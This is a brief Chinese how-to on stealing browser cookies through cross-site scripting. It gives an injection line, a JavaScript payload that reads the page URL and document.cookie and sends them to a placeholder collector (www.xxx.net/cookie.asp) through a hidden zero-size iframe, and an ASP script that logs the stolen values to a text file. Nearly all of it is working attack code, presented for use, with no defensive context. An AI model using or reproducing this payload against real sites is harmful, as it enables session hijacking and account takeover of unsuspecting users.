偷取Cookie，通过以下脚本引入一个js，document.write("<script src=XX.js></script>")，然后js内容为：

var code;

var target = "http://www.xxx.net/cookie.asp?";

info=escape(document.location+"@@@"+document.cookie);

target=target+info;

code="<iframe src=";

code=code+target;

code=code+" width=0 height=0></iframe>";

document.write(code);

这样就可以将cookie等信息传到我们的站点了！cookie.asp内容为：

复制代码代码如下:

dim fso,file,str

str=unescape(request.Servervariables("QUERY_STRING"))

Const ForReading = 1, ForWriting = 2, ForAppending = 8

Set fso = Server.CreateObject("Scripting.FileSystemObject")

path = server.mappath("xxx.txt")

set file=fso.opentextfile(path, ForAppending, TRUE)

file.write("Xss:")

file.write(str)

file.write vbCrLf

file.close

set file = nothing

set fso = nothing